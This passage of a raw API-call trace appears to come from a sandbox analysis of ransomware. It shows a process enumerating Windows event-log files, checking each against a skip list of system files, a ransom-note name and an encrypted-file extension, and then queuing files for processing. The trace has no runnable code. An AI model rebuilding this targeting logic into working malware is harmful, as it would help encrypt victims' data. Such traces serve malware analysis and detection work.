(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.527] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.535] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.535] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" [0089.535] SetEvent (hEvent=0x3fc) returned 1 [0089.535] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c9b1b6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9c9b1b6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cAlternateFileName="MI7771~1.EVT")) returned 1 [0089.535] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2=".") returned 1 [0089.535] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="..") returned 1 [0089.535] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.535] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.535] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" [0089.535] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned=".evtx" [0089.535] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.535] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="bootsect.bak") returned 1 [0089.535] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="iconcache.db") returned 1 [0089.535] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="thumbs.db") returned -1 [0089.535] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2=" ransomware ") returned 1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2=" ransom ") returned 1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="debug.txt") returned 1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="boot.ini") returned 1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="desktop.ini") returned 1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="autorun.inf") returned 1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="ntuser.dat") returned -1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="ntldr") returned -1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="ntdetect.com") returned -1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="bootfont.bin") returned 1 [0089.536] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.536] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned=".evtx" [0089.536] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.536] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.539] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.539] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" [0089.539] SetEvent (hEvent=0x418) returned 1 [0089.539] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9df26e9, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9df26e9, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cAlternateFileName="MI4667~1.EVT")) returned 1 [0089.539] StrCmpW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2=".") returned 1 [0089.539] StrCmpW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="..") returned 1 [0089.539] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.539] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.539] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" [0089.539] PathFindExtensionW (pszPath="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned=".evtx" [0089.539] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.539] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="bootsect.bak") returned 1 [0089.539] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="iconcache.db") returned 1 [0089.539] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="thumbs.db") returned -1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2=" ransomware ") returned 1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2=" ransom ") returned 1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="debug.txt") returned 1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="boot.ini") returned 1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="desktop.ini") returned 1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="autorun.inf") returned 1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="ntuser.dat") returned -1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="ntldr") returned -1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="ntdetect.com") returned -1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="bootfont.bin") returned 1 [0089.540] StrCmpIW (psz1="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.540] PathFindExtensionW (pszPath="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned=".evtx" [0089.540] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.540] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.609] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.609] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" [0089.609] SetEvent (hEvent=0x3fc) returned 1 [0089.609] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122d184, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd122d184, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Winlogon%4Operational.evtx", cAlternateFileName="MID6AB~1.EVT")) returned 1 [0089.609] StrCmpW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2=".") returned 1 [0089.609] StrCmpW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="..") returned 1 [0089.610] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.610] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.610] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Winlogon%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" [0089.610] PathFindExtensionW (pszPath="Microsoft-Windows-Winlogon%4Operational.evtx") returned=".evtx" [0089.610] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2=" ransom ") returned 1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="debug.txt") returned 1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="boot.ini") returned 1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="ntldr") returned -1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.610] StrCmpIW (psz1="Microsoft-Windows-Winlogon%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.610] PathFindExtensionW (pszPath="Microsoft-Windows-Winlogon%4Operational.evtx") returned=".evtx" [0089.610] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.610] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.613] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.613] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Winlogon%4Operational.evtx" [0089.613] SetEvent (hEvent=0x410) returned 1 [0089.613] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf164b9b, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcf164b9b, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-WMI-Activity%4Operational.evtx", cAlternateFileName="MIFF83~1.EVT")) returned 1 [0089.614] StrCmpW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2=".") returned 1 [0089.614] StrCmpW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="..") returned 1 [0089.614] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.614] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.614] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-WMI-Activity%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" [0089.614] PathFindExtensionW (pszPath="Microsoft-Windows-WMI-Activity%4Operational.evtx") returned=".evtx" [0089.614] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2=" ransom ") returned 1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="debug.txt") returned 1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="boot.ini") returned 1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="ntldr") returned -1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.614] StrCmpIW (psz1="Microsoft-Windows-WMI-Activity%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.614] PathFindExtensionW (pszPath="Microsoft-Windows-WMI-Activity%4Operational.evtx") returned=".evtx" [0089.614] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.614] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0089.628] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.628] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx" [0089.628] SetEvent (hEvent=0x410) returned 1 [0089.628] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xf9a458f4, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Security.evtx", cAlternateFileName="SECURI~1.EVT")) returned 1 [0089.628] StrCmpW (psz1="Security.evtx", psz2=".") returned 1 [0089.628] StrCmpW (psz1="Security.evtx", psz2="..") returned 1 [0089.628] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.628] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.628] StrNCatW (in: psz1="C:\\Logs\\", psz2="Security.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Security.evtx") returned="C:\\Logs\\Security.evtx" [0089.628] PathFindExtensionW (pszPath="Security.evtx") returned=".evtx" [0089.628] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.628] StrCmpIW (psz1="Security.evtx", psz2="bootsect.bak") returned 1 [0089.628] StrCmpIW (psz1="Security.evtx", psz2="iconcache.db") returned 1 [0089.628] StrCmpIW (psz1="Security.evtx", psz2="thumbs.db") returned -1 [0089.628] StrCmpIW (psz1="Security.evtx", psz2=" ransomware ") returned 1 [0089.628] StrCmpIW (psz1="Security.evtx", psz2=" ransom ") returned 1 [0089.628] StrCmpIW (psz1="Security.evtx", psz2="debug.txt") returned 1 [0089.629] StrCmpIW (psz1="Security.evtx", psz2="boot.ini") returned 1 [0089.629] StrCmpIW (psz1="Security.evtx", psz2="desktop.ini") returned 1 [0089.629] StrCmpIW (psz1="Security.evtx", psz2="autorun.inf") returned 1 [0089.629] StrCmpIW (psz1="Security.evtx", psz2="ntuser.dat") returned 1 [0089.629] StrCmpIW (psz1="Security.evtx", psz2="ntldr") returned 1 [0089.629] StrCmpIW (psz1="Security.evtx", psz2="ntdetect.com") returned 1 [0089.629] StrCmpIW (psz1="Security.evtx", psz2="bootfont.bin") returned 1 [0089.629] StrCmpIW (psz1="Security.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.629] PathFindExtensionW (pszPath="Security.evtx") returned=".evtx" [0089.629] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.629] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.633] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.633] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Security.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Security.evtx") returned="\\\\?\\C:\\Logs\\Security.evtx" [0089.633] SetEvent (hEvent=0x408) returned 1 [0089.634] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95a6db2c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x95a6db2c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1d86ba0, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Setup.evtx", cAlternateFileName="SETUP~1.EVT")) returned 1 [0089.634] StrCmpW (psz1="Setup.evtx", psz2=".") returned 1 [0089.634] StrCmpW (psz1="Setup.evtx", psz2="..") returned 1 [0089.634] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.634] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.634] StrNCatW (in: psz1="C:\\Logs\\", psz2="Setup.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Setup.evtx") returned="C:\\Logs\\Setup.evtx" [0089.634] PathFindExtensionW (pszPath="Setup.evtx") returned=".evtx" [0089.635] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="bootsect.bak") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="iconcache.db") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="thumbs.db") returned -1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2=" ransomware ") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2=" ransom ") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="debug.txt") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="boot.ini") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="desktop.ini") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="autorun.inf") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="ntuser.dat") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="ntldr") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="ntdetect.com") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="bootfont.bin") returned 1 [0089.635] StrCmpIW (psz1="Setup.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.635] PathFindExtensionW (pszPath="Setup.evtx") returned=".evtx" [0089.635] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.635] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.733] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.733] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Setup.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Setup.evtx") returned="\\\\?\\C:\\Logs\\Setup.evtx" [0089.733] SetEvent (hEvent=0x408) returned 1 [0089.733] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505097c4, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505097c4, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x111000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="System.evtx", cAlternateFileName="SYSTEM~1.EVT")) returned 1 [0089.733] StrCmpW (psz1="System.evtx", psz2=".") returned 1 [0089.733] StrCmpW (psz1="System.evtx", psz2="..") returned 1 [0089.733] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.733] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.733] StrNCatW (in: psz1="C:\\Logs\\", psz2="System.evtx", cchMax=1040 | out: psz1="C:\\Logs\\System.evtx") returned="C:\\Logs\\System.evtx" [0089.733] PathFindExtensionW (pszPath="System.evtx") returned=".evtx" [0089.733] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.733] StrCmpIW (psz1="System.evtx", psz2="bootsect.bak") returned 1 [0089.733] StrCmpIW (psz1="System.evtx", psz2="iconcache.db") returned 1 [0089.733] StrCmpIW (psz1="System.evtx", psz2="thumbs.db") returned -1 [0089.734] StrCmpIW (psz1="System.evtx", psz2=" ransomware ") returned 1 [0089.734] StrCmpIW (psz1="System.evtx", psz2=" ransom ") returned 1 [0089.734] StrCmpIW (psz1="System.evtx", psz2="debug.txt") returned 1 [0089.734] StrCmpIW (psz1="System.evtx", psz2="boot.ini") returned 1 [0089.734] StrCmpIW (psz1="System.evtx", psz2="desktop.ini") returned 1 [0089.734] StrCmpIW (psz1="System.evtx", psz2="autorun.inf") returned 1 [0089.734] StrCmpIW (psz1="System.evtx", psz2="ntuser.dat") returned 1 [0089.734] StrCmpIW (psz1="System.evtx", psz2="ntldr") returned 1 [0089.734] StrCmpIW (psz1="System.evtx", psz2="ntdetect.com") returned 1 [0089.734] StrCmpIW (psz1="System.evtx", psz2="bootfont.bin") returned 1 [0089.734] StrCmpIW 